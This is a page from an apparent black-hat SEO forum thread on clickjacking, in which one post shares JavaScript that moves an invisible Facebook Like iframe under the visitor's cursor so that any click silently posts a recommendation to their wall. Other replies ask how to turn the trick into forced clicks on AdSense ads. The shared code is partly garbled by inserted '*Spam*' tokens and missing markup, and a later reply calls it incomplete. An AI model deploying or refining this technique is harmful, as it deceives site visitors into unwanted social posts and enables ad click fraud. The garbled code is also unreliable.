+ Reply to Thread + Post New Thread
Page 5 of 6 FirstFirst 123456 LastLast
Results 41 to 50 of 55

Thread: ClickJacking / Auto Subscribe YouTube

  1. #41
    Noobie
    Join Date
    Apr 2008
    Posts
    76
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    i used Facebook Like plugin and tested.

  2. Shorten URL    SEO Services    Buy Xrumer

    Sponsored Links

  3. #42
    Noobie
    Join Date
    Apr 2008
    Posts
    266
    Thanks
    0
    Thanked 1 Time in 1 Post

    Default

    This is pretty awesome...for anyone who doesn't know what Facebook Like is (it's brand new) it's a button that can instantly put your site as a recommendation on someone's wall. You can use the code above originally intended for Youtube in combination with the Facebook Like button code to make an instant facebook wall posting about anything. There's only one problem - maybe someone can help solve it.

    The problem is that one click will put you on their wall, and another will remove it. Unfortunately the javascript below can't seem to detect that a click has been made and disable clicking on the invisible iframe (the div onclick code doesn't work). I've experimented and can't get anything to disable clicking to the invisible button after the first click. So if the user clicks twice (or an even number of times) on your page it will not show up on their wall - it will be posted and then removed.

    Any ideas?

    *Note - You must fill in your site link where it says to in the code below or it won't work. If you click once on this page (or an odd number of times) it will actually instantly post to your wall!*

    Code:
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam* *Spam* *Spam*Auto Facebook Like
    
    
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam* *Spam* *Spam*Hello !!! Welcome to my site!
    *Spam**Spam* *Spam*
    *Spam**Spam* 
    *Spam*
    *Spam**Spam* *Spam* *Spam* *Spam*
    *Spam**Spam* *Spam*
    
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam* *Spam* *Spam*var iflag = 0;
    *Spam**Spam* *Spam*function mouseFollower(e){
    *Spam**Spam* *Spam* *Spam* *Spam*/* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam*DO NOT EDIT THIS *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* *Spam* */
    *Spam**Spam* *Spam* *Spam* *Spam*x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
    *Spam**Spam* *Spam* *Spam* *Spam*y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
    *Spam**Spam* *Spam* *Spam* *Spam*/* ------------------------------------------------------------*/
    *Spam**Spam* *Spam* *Spam* *Spam*/* places the iframe at the tip of the cursor, to make it clickable */
    *Spam**Spam* *Spam* *Spam* *Spam*icontainer.style.left = (x - 13) + 'px';
    *Spam**Spam* *Spam* *Spam* *Spam*icontainer.style.top = (y - 35) + 'px';
    *Spam**Spam* *Spam*}
    *Spam**Spam* *Spam*document.onmousemove = function(e) {
    *Spam**Spam* *Spam* *Spam* *Spam*if (iflag == 0) {
    *Spam**Spam* *Spam* *Spam* *Spam* *Spam* *Spam*mouseFollower(e);
    *Spam**Spam* *Spam* *Spam* *Spam*}
    *Spam**Spam* *Spam*}
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam*
    *Spam**Spam* *Spam*
    So first fill in your URL where it says to above. On your target page, put the following code in between your tags to control the content of the wall posting of the user:





    This would generate the following wall posting:

    John recommends Desired Page Title on Site Name.

    To learn more about the facebook like button see:
    Code:
    http://developers.facebook.com/docs/reference/plugins/like

  4. The Following User Says Thank You to thefish2010 For This Useful Post:

    Money (11-23-2010)

  5. #43
    Noobie
    Join Date
    Apr 2008
    Posts
    518
    Thanks
    0
    Thanked 4 Times in 3 Posts

    Default

    Can anybody explain to me how to use this to make users click on my adsense ads?

  6. #44
    Noobie
    Join Date
    Apr 2008
    Posts
    199
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    same here, anyone?

  7. #45
    SEO Apprentice zero's Avatar
    Join Date
    May 2010
    Posts
    11
    Thanks
    3
    Thanked 0 Times in 0 Posts

    Default

    Hi,

    I don't have any immediate use, but I learned something from reading the code.

    Thanks, mate :)

  8. #46
    Noobie
    Join Date
    Oct 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    doesn't work for me. when i put it on a test page, all i get is a screen with the code.

    is this javascript or what? how do i implement it?

  9. #47
    SEO Apprentice
    Join Date
    Oct 2010
    Posts
    11
    Thanks
    1
    Thanked 0 Times in 0 Posts

    Default

    wow man .gr8 BH script. trying to implement now

  10. #48
    Noobie
    Join Date
    Oct 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    how do you know it's gr8 if you haven't implemented it yet? i still can't get anything to work

  11. #49
    Registered Member likewhoa's Avatar
    Join Date
    Dec 2010
    Posts
    40
    Thanks
    18
    Thanked 10 Times in 7 Posts

    Default

    Quote Originally Posted by thefish2010
    ;1742503
    *Note - You must fill in your site link where it says to in the code below or it won't work. If you click once on this page (or an odd number of times) it will actually instantly post to your wall!*
    I don't see anywhere that states where to enter a URL. This whole thing is incomplete at best.

  12. #50
    SEO Apprentice lukowitsch's Avatar
    Join Date
    May 2011
    Posts
    18
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Is this still working? Please help :)

+ Reply to Thread
Page 5 of 6 FirstFirst 123456 LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts